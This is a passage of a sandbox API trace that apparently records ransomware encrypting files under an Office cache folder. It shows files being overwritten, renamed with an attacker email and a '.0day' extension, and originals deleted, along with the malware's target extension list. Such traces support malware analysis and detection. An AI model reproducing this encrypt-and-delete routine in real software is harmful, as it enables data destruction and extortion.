lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0042.550] lstrlenW (lpString="ProjLR.cab") returned 10 [0042.551] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.673] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=8265165) returned 1 [0042.674] CloseHandle (hObject=0x20c) returned 1 [0042.674] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0042.674] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.674] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.674] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.674] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0042.674] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.674] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.747] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.747] ReadFile (in: hFile=0x20c, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.762] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.762] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0042.762] ReadFile (in: hFile=0x20c, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.803] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.803] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0042.957] SetEndOfFile (hFile=0x20c) returned 1 [0042.957] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fda0c0 [0042.957] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.957] WriteFile (in: hFile=0x20c, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.958] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.958] WriteFile (in: hFile=0x20c, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.960] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0042.960] WriteFile (in: hFile=0x20c, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.962] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fda0c0 | out: hHeap=0x5f0000) returned 1 [0042.962] CloseHandle (hObject=0x20c) returned 1 [0042.963] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.963] lstrlenW (lpString=".doc") returned 4 [0042.963] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString=".docx") returned 5 [0042.963] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.963] lstrlenW (lpString=".pdf") returned 4 [0042.963] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString=".xls") returned 4 [0042.963] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString=".xlsx") returned 5 [0042.963] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.963] lstrlenW (lpString=".ppt") returned 4 [0042.963] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.963] lstrlenW (lpString=".zip") returned 4 [0042.963] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString=".rar") returned 4 [0042.963] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.963] lstrlenW (lpString=".bz2") returned 4 [0042.963] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.963] lstrlenW (lpString=".7z") returned 3 [0042.964] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString=".dbf") returned 4 [0042.964] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString=".1cd") returned 4 [0042.964] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString=".jpg") returned 4 [0042.964] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString=".doc") returned 4 [0042.964] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString=".docx") returned 5 [0042.964] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.964] lstrlenW (lpString=".pdf") returned 4 [0042.964] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString=".xls") returned 4 [0042.964] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString=".xlsx") returned 5 [0042.964] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.964] lstrlenW (lpString=".ppt") returned 4 [0042.964] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.964] lstrlenW (lpString=".zip") returned 4 [0042.964] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString=".rar") returned 4 [0042.964] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.964] lstrlenW (lpString=".bz2") returned 4 [0042.964] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.964] lstrlenW (lpString=".7z") returned 3 [0042.964] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.965] lstrlenW (lpString=".dbf") returned 4 [0042.965] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.965] lstrlenW (lpString=".1cd") returned 4 [0042.965] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0042.965] lstrlenW (lpString=".jpg") returned 4 [0042.965] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.965] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0042.965] lstrlenW (lpString="dwdcw20.dll") returned 11 [0042.965] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.139] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=526176) returned 1 [0043.139] CloseHandle (hObject=0x200) returned 1 [0043.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0043.139] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.139] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.139] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.139] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.139] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0043.140] GetLastError () returned 0x0 [0043.140] ReadFile (in: hFile=0x200, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x80760, lpOverlapped=0x0) returned 1 [0043.152] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80770, lpOverlapped=0x0) returned 1 [0043.162] ReadFile (in: hFile=0x200, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.162] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.162] SetEndOfFile (hFile=0x1c4) returned 1 [0043.162] CloseHandle (hObject=0x1c4) returned 1 [0043.162] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.163] SetEndOfFile (hFile=0x200) returned 1 [0043.414] CloseHandle (hObject=0x200) returned 1 [0043.414] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0043.415] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString=".doc") returned 4 [0043.416] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString=".docx") returned 5 [0043.416] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.416] lstrlenW (lpString=".pdf") returned 4 [0043.416] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString=".xls") returned 4 [0043.416] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString=".xlsx") returned 5 [0043.416] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.416] lstrlenW (lpString=".ppt") returned 4 [0043.416] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString=".zip") returned 4 [0043.416] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString=".rar") returned 4 [0043.416] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.416] lstrlenW (lpString=".bz2") returned 4 [0043.416] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.416] lstrlenW (lpString=".7z") returned 3 [0043.416] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString=".dbf") returned 4 [0043.416] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString=".1cd") returned 4 [0043.416] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.416] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.416] lstrlenW (lpString=".jpg") returned 4 [0043.416] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString=".doc") returned 4 [0043.417] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString=".docx") returned 5 [0043.417] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0043.417] lstrlenW (lpString=".pdf") returned 4 [0043.417] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString=".xls") returned 4 [0043.417] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString=".xlsx") returned 5 [0043.417] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0043.417] lstrlenW (lpString=".ppt") returned 4 [0043.417] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString=".zip") returned 4 [0043.417] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString=".rar") returned 4 [0043.417] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0043.417] lstrlenW (lpString=".bz2") returned 4 [0043.417] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0043.417] lstrlenW (lpString=".7z") returned 3 [0043.417] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString=".dbf") returned 4 [0043.417] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString=".1cd") returned 4 [0043.417] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0043.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0043.417] lstrlenW (lpString=".jpg") returned 4 [0043.417] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0043.462] lstrcmpiW (lpString1=".manifest", lpString2=".0day") returned 1 [0043.462] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0043.462] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.462] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1857) returned 1 [0043.462] CloseHandle (hObject=0x20c) returned 1 [0043.462] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0043.463] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.463] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0043.463] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.463] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.463] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0043.465] GetLastError () returned 0x0 [0043.465] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x741, lpOverlapped=0x0) returned 1 [0043.469] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x750, lpOverlapped=0x0) returned 1 [0043.470] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0043.470] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x10a, lpOverlapped=0x0) returned 1 [0043.470] SetEndOfFile (hFile=0x16c) returned 1 [0043.470] CloseHandle (hObject=0x16c) returned 1 [0043.470] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0043.470] SetEndOfFile (hFile=0x20c) returned 1 [0043.471] CloseHandle (hObject=0x20c) returned 1 [0043.471] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0043.472] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0043.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.472] lstrlenW (lpString=".doc") returned 4 [0043.472] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".docx") returned 5 [0043.472] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0043.472] lstrlenW (lpString=".pdf") returned 4 [0043.472] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".xls") returned 4 [0043.472] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".xlsx") returned 5 [0043.472] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0043.472] lstrlenW (lpString=".ppt") returned 4 [0043.472] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.472] lstrlenW (lpString=".zip") returned 4 [0043.472] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".rar") returned 4 [0043.472] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".bz2") returned 4 [0043.472] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0043.472] lstrlenW (lpString=".7z") returned 3 [0043.472] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0043.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.472] lstrlenW (lpString=".dbf") returned 4 [0043.472] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] lstrlenW (lpString=".1cd") returned 4 [0043.473] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0043.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0043.473] 